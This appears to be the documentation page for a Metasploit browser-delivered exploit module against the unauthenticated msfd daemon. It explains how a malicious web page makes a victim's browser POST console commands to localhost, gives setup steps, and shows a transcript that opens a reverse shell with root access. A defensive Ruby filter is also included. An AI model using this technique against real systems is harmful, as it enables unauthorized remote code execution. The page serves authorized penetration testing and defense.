metasploit-gs/documentation/modules/exploit/multi/browser/msfd_rce_browser.md
## Description
This module connects to the Metasploit `msfd` daemon and uses its Ruby
interpreter to obtain a shell. It is intended for the case where the vulnerable
service listens only on localhost and the attacker has no foothold on the
machine: the command is delivered from the victim's browser, so the victim must
visit the attacker's web site.
## Vulnerable Application
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
of providing remote access: the msf daemon (`msfd`). The daemon provides no
authentication at all and is therefore exposed to any attacker with IP access
to it. When the daemon listens only on localhost, this module takes advantage of
the fact that the victim's web browser has IP access to it.
Because the msfconsole program is line-based, commands can be delivered over the
HTTP protocol: each line of the request is read as a separate command, the
request line and headers fail as unknown commands, and the line carried in the
body is executed. This module places the msfconsole command in the POST data of
an HTTP request. Since a simple POST of this kind is sent cross-origin by
browsers without a preflight check, the attacker's web application can make the
victim's browser submit it to localhost. The browser is not allowed to read the
response, but that does not matter here, since the command itself sets up the
session.
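The cross-protocol delivery described above points at a daemon-side mitigation. As an added example, not code from the Metasploit project or from `msfd`, the Ruby below guards a line-based console listener by refusing any connection whose first line is an HTTP request line, so a browser-issued POST never reaches the command interpreter; the two sample streams are constructed.

```ruby
# Added example (not Metasploit or msfd code): refuse console connections that
# open with an HTTP request line, closing the HTTP-to-line-protocol gap.

HTTP_METHODS = %w[GET POST PUT HEAD OPTIONS DELETE PATCH CONNECT TRACE].freeze
# "METHOD SP request-target SP HTTP/x[.y]" as a browser would send it.
HTTP_REQUEST_LINE = %r{\A(?:#{HTTP_METHODS.join('|')})\s+\S+\s+HTTP/\d(?:\.\d)?\s*\z}

# Classify the first line read from a freshly accepted connection.
#   :http    -> an HTTP client (e.g. a browser) opened the connection; drop it
#   :command -> plausible console input; it may be handed to the console
def classify_first_line(line)
  line.to_s.chomp.match?(HTTP_REQUEST_LINE) ? :http : :command
end

# Filter a whole captured stream (array of lines as read from the socket).
# Returns the lines that may reach the console and, when the stream was an
# HTTP request, the reason the connection was refused. Blank lines are dropped.
def filter_stream(lines)
  lines = Array(lines).map { |l| l.to_s.chomp }
  if classify_first_line(lines.first) == :http
    return { accepted: [], rejected: :http_request }
  end
  { accepted: lines.reject(&:empty?), rejected: nil }
end

# Constructed sample input: a cross-origin form POST as it appears on the wire
# (request line, headers, blank line, body) beside a normal console session.
BROWSER_POST = [
  "POST / HTTP/1.1",
  "Host: 127.0.0.1:55554",
  "Origin: http://example.test",
  "Content-Type: text/plain",
  "Content-Length: 7",
  "",
  "version",
].freeze

CONSOLE_SESSION = ["version", "", "exit"].freeze

if __FILE__ == $0
  p filter_stream(BROWSER_POST)     # {:accepted=>[], :rejected=>:http_request}
  p filter_stream(CONSOLE_SESSION)  # {:accepted=>["version", "exit"], :rejected=>nil}
end
```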
All versions of Metasploit are affected; however, testing has only been
performed on the following targets:
* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
* Metasploit 4.16.51 on Windows 7 (using IE; exploitation failed in Firefox and Chrome)
***NB!*** Exploitation on Windows had a higher rate of success when the quiet
flag (`-q`) was passed to the msf daemon. On Linux, it made no difference.
Source code and installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://docs.metasploit.com/docs/development/maintainers/downloads-by-version.html)
## Verification Steps
1. Start the vulnerable service `msfd -q -f`
2. Start `msfconsole`
3. Do: `use exploit/multi/browser/msfd_rce_browser`
4. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
5. Do: `set RPORT [PORT]` (default: `55554`)
6. Do: `set PAYLOAD [PAYLOAD]`
7. Do: `exploit`
8. Do: Visit the listed URL from the victim's machine
9. You should get a shell
## Options
Options unique to this module are described below.
**REMOTE_IP**
IP to target when running inside the victim's browser.
**REMOTE_PORT**
Port the vulnerable service is listening on (default: 55554).
## Scenarios
### Through the victim's browser
```
msf > use exploit/multi/browser/msfd_rce_browser
msf exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
lhost => 192.168.0.17
msf exploit(multi/browser/msfd_rce_browser) > set lport 443
lport => 443
msf exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
msf exploit(multi/browser/msfd_rce_browser) > [*] Using URL: http://0.0.0.0:8080/J5ras6oYftFWW4
[*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
[*] Server started.
```
Visit the web site listed in a browser on the victim's machine and you should
get the output below.
```
[*] 192.168.0.17 msfd_rce_browser - Sending HTML...
[*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
```